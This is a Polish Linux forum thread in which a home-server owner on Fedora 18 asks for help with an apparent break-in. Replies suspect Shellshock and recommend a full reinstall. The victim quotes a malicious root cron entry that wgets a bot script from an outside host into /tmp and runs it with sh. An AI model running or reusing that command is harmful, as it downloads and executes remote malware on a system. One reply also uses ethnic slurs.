lukbok Napisano Październik 30, 2014 Zgłoszenie Share Napisano Październik 30, 2014 Witam serdecznie.Ze względu na to, że moja widza jest niewystarczająca proszę Was o pomoc w zdiagnozowaniu "włamania":System to fedora 18. Pracuje jako router, serwer www, imap, pop itd.Co wzbudziło moja podejrzenia:1. bardzo duże obciążenie generowane przez proces /user/local/nagidodam, że nie mam takiego katalogu. Po rozszerzeniu opisu ps -A -f otrzymałem: /usr/local/nagios/bin/nrpe -c /usr/local/nagios/etc/nrpe.cfg W systemie nie ma nagiosa, a tym bardziej folderu oraz pliku nrpe.cfg2. był uruchomiony proces "b", a w pliku /etc/rc.d/rc.local był dodany (nie przeze mnie) wpis "/root/b"w katalogu /root/ nie ma pliku b3. zauważyłem że adres bramki w "route" jest inny niż ten który dostałem od prowidera (z sieci dialog) i w ogóle się nie pokrywa z adresem zewnętrznym IP.w logach nie ma nic podejrzanego, a w secure.log są tylko moje logowania.Po wykasowaniu wpisu w rc.local oraz resecie serwera procesy b oraz nagiosa znikają ale po kilku tygodniach znowu się pojawiają.Witam ponowniew cronie znalazłem jeszcze takie wpisy:1. root Nie wget -q http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm /tmp/sh >2. unbound Nie /usr/sbin/unbound-anchor -a /var/lib/unbound/root.key -c /etc/unbound/icannbundl ...narazie je wyłączyłem. Odnośnik do komentarza Udostępnij na innych stronach More sharing options...
@WalDo Napisano Październik 30, 2014 Zgłoszenie Share Napisano Październik 30, 2014 Nie pisz postów pod własnymi i do tego cytując własny poprzedni wpis. Przyznasz, że to trochę bez sensu? kody, polecenia itp jak np. wyżej przedstawione "wget" czy "unbound-anchor" wstawiaj między znaczniki 'code'. Nie wiem jak u innych, ale u mnie obrazki (bo to chyba są obrazki?) nie wyświetlają się. Co do tematu, to zacząłbym od wyjaśnienia przypadku, który opisałeś w innym wątku dot. crontaba. Poza tyym tu jest trochę do poczytania: http://de.comp.security.misc.narkive.com/v6Wecfis/shellshock.2 Nie znam niemieckiego, ale strona przetłumaczona w google-chrome daje jakie takie pojęcie o problemie. Z grubsza - o ile dobrze to rozumiem, bo czytałem pobieznie - to ktoś mógł próbować wykorzystać lub wykorzystał dziurę w bash. Nie wiem czy w F18 ta dziura została załatana. Takie są m.in. problemy, gdy nie korzysta się z nowszych wersji systemów tylko pozostaje na niewspieranym systemie. Jeśli ten sprzęt służy jako serwer, to lepiej by było zainstalować CentOS. Lepszy na serwer a przede wszystkim cykle wsparcia znacznie dłuższe niż w Fedorze. http://wiki.centos.org/FAQ/General#head-fe8a0be91ee3e7dea812e8694491e1dde5b75e6d Odnośnik do komentarza Udostępnij na innych stronach More sharing options...
@sunrise Napisano Październik 30, 2014 Zgłoszenie Share Napisano Październik 30, 2014 F18 już dawno nie jest wspierana, a w międzyczasie było kilka groźnych luk heartbleed/shellshock. W twoim przypadku prawdopodobnie wykorzystano shellshock szczególnie, że korzystasz z webmina. Jedyną prawidłową reakcją na taki incydent jest postawienie całego systemu od nowa w aktualnej wspieranej wersji oraz oczywiście zaktualizownie go. Sądząc po uruchomionych programach, proponuje zmianę haseł do wszystkich usług, do których logowałeś się z tego komputera (poczta, ssh, konta bankowe itd) Obrazki nie wyświetają się bo link kieruje na adres prywatny 192.168.5.1, sądząc po numerze portu jest to webmin autora wątku. Odnośnik do komentarza Udostępnij na innych stronach More sharing options...
lukbok Napisano Październik 30, 2014 Autor Zgłoszenie Share Napisano Październik 30, 2014 Witam, Przepraszam Was za ten chaos w mojej wypowiedzi ale jestem troszkę poddenerwowany całą tą sytuacją. Nie chciałem wklejać linków (obrazków), a jedynie tekst (własnie to poprawiłem). Szkoda, że polecacie postawienie serwer na nowo. Zajmie mi to chyba z tydzień i jakoś chcę tego uniknąć Dziękuję za informacje Odnośnik do komentarza Udostępnij na innych stronach More sharing options...
@WalDo Napisano Październik 30, 2014 Zgłoszenie Share Napisano Październik 30, 2014 Szkoda, że polecacie postawienie serwer na nowo. Zajmie mi to chyba z tydzień i jakoś chcę tego uniknąćJeśli ktoś Ci się włamał, to warto zrobić backup całości, żeby później poszukać co się stało, ale system do przeinstalowania, bo tak naprawdę nigdy nie będziesz do końca wiedział co i gdzie Ci się zainstalowało. Lepiej stracić tydzień niż potem uprawiać fekaloplastykę tygodniami. Odnośnik do komentarza Udostępnij na innych stronach More sharing options...
Miszcz Napisano Październik 31, 2014 Zgłoszenie Share Napisano Październik 31, 2014 Może będę wredny i chamski, ale muszę zadać to pytanie: co z Ciebie za admin? System został skompromitowany i trzeba być skrajnie nieodpowiedzialnym, żeby go ratować zamiast usunąć i postawić na nowo. Skąd wiesz jaki był wektor ataku? Wejście może być znane jak powiedział kolega @sunrise mógł być to shellshock, ale teraz na tym systemie masz z dużym prawdopodobieństwem powykradane dane, hashe, bazy, pocztę, emaile, prywatne pliki. Jednak najważniejsza jest możliwość, że jakiś rusek albo skośnoki, mógł w tym starym, niewspieranym systemie() zainstalować rootkita w postaci modułu kernela, który jest niewidzialny i niewykrywalny. I ciągle może wysyłać wrażliwe dane, nawet gdy będzie ci się wydawać, że "już wszystko naprawiłem bo załatałem shellsocka". Jeżeli jest to ważny serwer i trzymałeś tam dane osób trzecich to masz nawet OBOWIĄZEK zgłoszenia takiego faktu na policję i ustalenia co zostało wykradzione. Tyle odemnie, ale admin to z ciebie widzę niezły. EDIT: Aha i oczywiście pewnie backupy posiadasz i postawienie systemu zajmie ci 1h z updatem do F20? 1 Odnośnik do komentarza Udostępnij na innych stronach More sharing options...
lukbok Napisano Październik 31, 2014 Autor Zgłoszenie Share Napisano Październik 31, 2014 Ok. Już się na mnie wyżyliście. Po części macie rację. To jest taki domowy (dla członków rodziny) serwer: plików, poczty (obsługa kilku domen), www. Postawiłem go kilka lat temu (jak jeszcze bardziej siedziałem w linuxie) i zapomiałem o problemie. To było raczej takie hobby. Nie mam siły stawiać tego na nowo dlatego wykupiłem hosting i przeniosłem pocztę. Jako serwer plików kupię jakiś NAS i dam dyski w macierzy. Dziękuję i pozdrawiam Odnośnik do komentarza Udostępnij na innych stronach More sharing options...
Miszcz Napisano Październik 31, 2014 Zgłoszenie Share Napisano Październik 31, 2014 Tiaaaaaaaa.... Odnośnik do komentarza Udostępnij na innych stronach More sharing options...
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się